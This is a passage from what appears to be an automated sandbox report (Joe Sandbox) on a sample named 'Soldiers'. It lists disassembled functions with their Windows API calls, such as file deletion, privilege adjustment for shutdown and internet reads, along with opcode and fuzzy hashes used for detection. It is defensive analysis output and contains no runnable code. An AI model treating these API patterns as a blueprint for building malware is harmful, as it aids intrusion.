                                                          • FindNextFileW.KERNEL32(?,?), ref: 0094FB80
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: Find$File_wcscmp$CloseFirstMessageNextPeekSleep_memmove
                                                          • String ID: *.*
                                                          • API String ID: 2185952417-438819550
                                                          • Opcode ID: 7f4b5b195d82bfa47b1e361c9fb92e233785d5016384c00d57989ef0980f2d5d
                                                          • Instruction ID: ab1fa5d4da55ac5e9c8260811d076f98196ba3850756f83f4188259c44b2b7e0
                                                          • Opcode Fuzzy Hash: 7f4b5b195d82bfa47b1e361c9fb92e233785d5016384c00d57989ef0980f2d5d
                                                          • Instruction Fuzzy Hash: AA417F7290021EDFCF14DF64CC69EEEBBB8FF45350F148565E818A2291EB309A84CB91
                                                          Function 00944005 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00900284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008F2A58,?,00008000), ref: 009002A4
                                                            • Part of subcall function 00944FEC: GetFileAttributesW.KERNEL32(?,00943BFE), ref: 00944FED
                                                          • FindFirstFileW.KERNEL32(?,?), ref: 0094407C
                                                          • DeleteFileW.KERNEL32(?,?,?,?), ref: 009440CC
                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 009440DD
                                                          • FindClose.KERNEL32(00000000), ref: 009440F4
                                                          • FindClose.KERNEL32(00000000), ref: 009440FD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                          • String ID: \*.*
                                                          • API String ID: 2649000838-1173974218
                                                          • Opcode ID: ae84abec956b8bd2af88268a61501f2efc43038267dcf2d60eff2ef4696d00de
                                                          • Instruction ID: 1f45f281c79d7bee1dc04e0698ee0f322868f071884839a2989e347768284535
                                                          • Opcode Fuzzy Hash: ae84abec956b8bd2af88268a61501f2efc43038267dcf2d60eff2ef4696d00de
                                                          • Instruction Fuzzy Hash: C831803201D349DBC700EB64C895EBFB7ACBE95304F440A1DF5E5C2192EB219A19C7A3
                                                          Function 00945778 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00939399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 009393E3
                                                            • Part of subcall function 00939399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00939410
                                                            • Part of subcall function 00939399: GetLastError.KERNEL32 ref: 0093941D
                                                          • ExitWindowsEx.USER32(?,00000000), ref: 009457B4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                          • String ID: $@$SeShutdownPrivilege
                                                          • API String ID: 2234035333-194228
                                                          • Opcode ID: 8cf58fed984a2985236d2080f4b4c312407f45e9dd19822fd346f17382be0717
                                                          • Instruction ID: c1f47a515178af83e3c3fc0f7e858a712450dd33fcd6c689b8126cd2e3612289
                                                          • Opcode Fuzzy Hash: 8cf58fed984a2985236d2080f4b4c312407f45e9dd19822fd346f17382be0717
                                                          • Instruction Fuzzy Hash: 730126327A5712EBE72862E8DC8BFBF765CEB44750F228539F927D20D3EA505C008560
                                                          Function 008F5D13 Relevance: 9.2, APIs: 6, Instructions: 223COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetVersionExW.KERNEL32(?), ref: 008F5D40
                                                            • Part of subcall function 008F1821: _memmove.LIBCMT ref: 008F185B
                                                          • GetCurrentProcess.KERNEL32(?,00970A18,00000000,00000000,?), ref: 008F5E07
                                                          • IsWow64Process.KERNEL32(00000000), ref: 008F5E0E
                                                          • FreeLibrary.KERNEL32(00000000), ref: 008F5E5F
                                                          • GetSystemInfo.KERNEL32(00000000), ref: 008F5E90
                                                          • GetSystemInfo.KERNEL32(00000000), ref: 008F5E9C
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: InfoProcessSystem$CurrentFreeLibraryVersionWow64_memmove
                                                          • String ID:
                                                          • API String ID: 551412401-0
                                                          • Opcode ID: 700d60614f55ebe853406346e6287b1a935214f0ad5130242567c68bf668b7a8
                                                          • Instruction ID: 17b2d0df487b6941c6e672b4172e6a12fc642fdd9a6262098b040ee57ccdaeeb
                                                          • Opcode Fuzzy Hash: 700d60614f55ebe853406346e6287b1a935214f0ad5130242567c68bf668b7a8
                                                          • Instruction Fuzzy Hash: 1F91B53154DBC8DEC731CB7884505BABFE5BF29300F984A5ED2CB93A51D230A548DB5A
                                                          Function 008E1663 Relevance: 7.9, APIs: 5, Instructions: 379COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 008E29E2: GetWindowLongW.USER32(?,000000EB,?,?,?,008E1CE4,?), ref: 008E29F3
                                                          • DefDlgProcW.USER32(?,?,?,?,?), ref: 008E1DD6
                                                          • GetSysColor.USER32(0000000F,?,?), ref: 008E1E2A
                                                          • SetBkColor.GDI32(?,00000000), ref: 008E1E3D
                                                            • Part of subcall function 008E166C: DefDlgProcW.USER32(?,00000020,?), ref: 008E16B4
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: ColorProc$LongWindow
                                                          • String ID:
                                                          • API String ID: 3744519093-0
                                                          • Opcode ID: 51b5025aed7092747c00626e34138aa540a61bea707070c56eaff40b3cdf0aa2
                                                          • Instruction ID: 6ce6b31b1d2c34f9bc4c13b8a1c5384171aa052cf928775583d6c220710a349d
                                                          • Opcode Fuzzy Hash: 51b5025aed7092747c00626e34138aa540a61bea707070c56eaff40b3cdf0aa2
                                                          • Instruction Fuzzy Hash: CDA127B431958CBADE2C6B6F9C4DEBB259EFF83305F14420AF442C6191CA359D41D2B6
                                                          Function 0094C2FF Relevance: 7.6, APIs: 5, Instructions: 143fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(?,?), ref: 0094C329
                                                          • _wcscmp.LIBCMT ref: 0094C359
                                                          • _wcscmp.LIBCMT ref: 0094C36E
                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 0094C37F
                                                          • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0094C3AF
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: Find$File_wcscmp$CloseFirstNext
                                                          • String ID:
                                                          • API String ID: 2387731787-0
                                                          • Opcode ID: 6c4975d9664c00420569e3a101642867bb3bb9409ffedfc37993b56b57fd86ca
                                                          • Instruction ID: aaa8a57ee66c58ee4a9b2d39b6060ac31f60d8ccd7b418dc550d1c45bbd897b4
                                                          • Opcode Fuzzy Hash: 6c4975d9664c00420569e3a101642867bb3bb9409ffedfc37993b56b57fd86ca
                                                          • Instruction Fuzzy Hash: D3516BB66046069FD714DF68D490EAAB7E8FF89324F10861DF95AC73A1DB30AD04CB91
                                                          Function 009659B3 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • IsWindowVisible.USER32(?,00000001), ref: 00965A02
                                                          • IsWindowEnabled.USER32(?,?,00000001), ref: 00965A10
                                                          • GetForegroundWindow.USER32(?,?,00000001), ref: 00965A1D
                                                          • IsIconic.USER32(?,?,?,00000001), ref: 00965A2B
                                                          • IsZoomed.USER32(?,?,?,?,00000001), ref: 00965A39
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                          • String ID:
                                                          • API String ID: 292994002-0
                                                          • Opcode ID: 22e8c203480ac51b5445a980d84335c9d9f046f4c45a567b2b4660c7c2b31dfe
                                                          • Instruction ID: 6f2dcd2f3ff0f540da8530efb691b2854037df8363f4a3ea1e73e79ee3a87c2a
                                                          • Opcode Fuzzy Hash: 22e8c203480ac51b5445a980d84335c9d9f046f4c45a567b2b4660c7c2b31dfe
                                                          • Instruction Fuzzy Hash: 45112772700911AFE7211F678C84A2EBB9DFF85760F424129F809D7241DB70ED01CAE1
                                                          Function 0094C9DA Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CoInitialize.OLE32(00000000,00000001,00000000,00970980), ref: 0094CA75
                                                          • CoCreateInstance.OLE32(00973D3C,00000000,00000001,00973BAC,?), ref: 0094CA8D
                                                            • Part of subcall function 008F1A36: _memmove.LIBCMT ref: 008F1A77
                                                          • CoUninitialize.OLE32 ref: 0094CCFA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: CreateInitializeInstanceUninitialize_memmove
                                                          • String ID: .lnk
                                                          • API String ID: 2683427295-24824748
                                                          • Opcode ID: 1330e9f0c7d86e31acbe0196cbda1f24f6edb0a5ad36d30923b3ef4a9f81cbe9
                                                          • Instruction ID: b916a452b1f919d004ab31553f42e1b54d6d382944334ada2a793ed3d46a1a8b
                                                          • Opcode Fuzzy Hash: 1330e9f0c7d86e31acbe0196cbda1f24f6edb0a5ad36d30923b3ef4a9f81cbe9
                                                          • Instruction Fuzzy Hash: A2A13D71104245AFD300EF68CC85EABB7E8FF95754F00491CF599D7291EB71AA09CB92
                                                          Function 00920030 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: LocalTime__swprintf
                                                          • String ID: %.3d$WIN_XPe
                                                          • API String ID: 2070861257-2409531811
                                                          • Opcode ID: ab738dada9bc8cfae359a230648545407a4a5bdbd328f21a992e3e460d08f952
                                                          • Instruction ID: 4efb70036d76a72822c5c34679d52bd38b6f13f770e513aa000683e9c2f72795
                                                          • Opcode Fuzzy Hash: ab738dada9bc8cfae359a230648545407a4a5bdbd328f21a992e3e460d08f952
                                                          • Instruction Fuzzy Hash: D2D01272C98129EADB049A90E945EF9777CFBC4304F204892F906E2045D2799788EA22
                                                          Function 00944148 Relevance: 6.1, APIs: 4, Instructions: 85processCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 0094416D
                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 0094417B
                                                          • Process32NextW.KERNEL32(00000000,?), ref: 0094419B
                                                          • CloseHandle.KERNEL32(00000000), ref: 00944245
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                          • String ID:
                                                          • API String ID: 420147892-0
                                                          • Opcode ID: ead85ae521ccd10416386d1be370c3a47bf45905a1d9932e639fec31a1c0f55a
                                                          • Instruction ID: 522ea834bc02be3863e48e664d2ccca21e679cce182378d7337935a0aa77a044
                                                          • Opcode Fuzzy Hash: ead85ae521ccd10416386d1be370c3a47bf45905a1d9932e639fec31a1c0f55a
                                                          • Instruction Fuzzy Hash: 78316D71108345DBD700EF64D885BBEBBE8FF95350F40092DF695C21A1EBB1AA49CB92
                                                          Function 009529BA Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00951ED6,00000000), ref: 00952AAD
                                                          • InternetReadFile.WININET(00000001,00000000,00000001,00000001,?,?,?,?,?,?,?,?,00951ED6,00000000), ref: 00952AE4
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: Internet$AvailableDataFileQueryRead
                                                          • String ID:
                                                          • API String ID: 599397726-0
                                                          • Opcode ID: 2580dd1500641950da7b24b9039b70a4deebe91375b8b147c2760b0e91493803
                                                          • Instruction ID: ef11734354feba985c411bf8457e3b5e34209702ae2b3a3a75c70fac083351f4
                                                          • Opcode Fuzzy Hash: 2580dd1500641950da7b24b9039b70a4deebe91375b8b147c2760b0e91493803
                                                          • Instruction Fuzzy Hash: B741D671A04309FFEB20DF56DC81FBBB7BCEB82715F10442AFA05A6181D670AE499760
                                                          Function 0094B976 Relevance: 4.6, APIs: 3, Instructions: 73COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetErrorMode.KERNEL32(00000001), ref: 0094B986
                                                          • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0094B9E0
                                                          • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0094BA2D
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: ErrorMode$DiskFreeSpace
                                                          • String ID:
                                                          • API String ID: 1682464887-0
                                                          • Opcode ID: bbc2436173e2af37d7b51b9827356a901b6d3f8aa180b3d322e7365f4d32426b
                                                          • Instruction ID: c902fdfb7d7a5ae5d5a28e13eddd8d3e7f8a1695eb7b26e27e5c36c82b7c010c
                                                          • Opcode Fuzzy Hash: bbc2436173e2af37d7b51b9827356a901b6d3f8aa180b3d322e7365f4d32426b
                                                          • Instruction Fuzzy Hash: 0B214F75A10108EFCB00DFA5DC85EADBBB8FF49310F148099E909A7251DB319955CB51
                                                          Function 00939399 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00900FE6: std::exception::exception.LIBCMT ref: 0090101C
                                                            • Part of subcall function 00900FE6: __CxxThrowException@8.LIBCMT ref: 00901031
                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 009393E3
                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00939410
                                                          • GetLastError.KERNEL32 ref: 0093941D
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                          • String ID:
                                                          • API String ID: 1922334811-0
                                                          • Opcode ID: 49accdebf5788bac325e0fb13b26e4d0d8e4b6181698e05e94eb80b3b3475103
                                                          • Instruction ID: 3e8d9087c582c59c5317c379408a873554a00f1e0ebabb12d964f6e73ef2b214
                                                          • Opcode Fuzzy Hash: 49accdebf5788bac325e0fb13b26e4d0d8e4b6181698e05e94eb80b3b3475103
                                                          • Instruction Fuzzy Hash: 101151B2418205EFD728DF54DC85E2BB7BCFB88710B20852EF45A97291EB70AC41CB60
                                                          Function 009442D5 Relevance: 4.6, APIs: 3, Instructions: 61fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 009442FF
                                                          • DeviceIoControl.KERNEL32(00000000,002D1400,00000007,0000000C,?,0000000C,?,00000000), ref: 0094433C
                                                          • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00944345
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: CloseControlCreateDeviceFileHandle
                                                          • String ID:
                                                          • API String ID: 33631002-0
                                                          • Opcode ID: 0cd1afbce6ef06addf7a5d3b964351f465c9a76fd5be73c8d81ac1c9f93daabb
                                                          • Instruction ID: 2dacaafd79f12186c24d120d86882b04cb05141697a20cc8e539c29bb8c5b830
                                                          • Opcode Fuzzy Hash: 0cd1afbce6ef06addf7a5d3b964351f465c9a76fd5be73c8d81ac1c9f93daabb
                                                          • Instruction Fuzzy Hash: CB11A5B2D14229BFE7109BE8DC44FAFB7BCEB09B10F100556B914E7190D2745D4087E1
                                                          Function 00944F1C Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00944F45
                                                          • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00944F5C
                                                          • FreeSid.ADVAPI32(?), ref: 00944F6C
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: AllocateCheckFreeInitializeMembershipToken
                                                          • String ID:
                                                          • API String ID: 3429775523-0
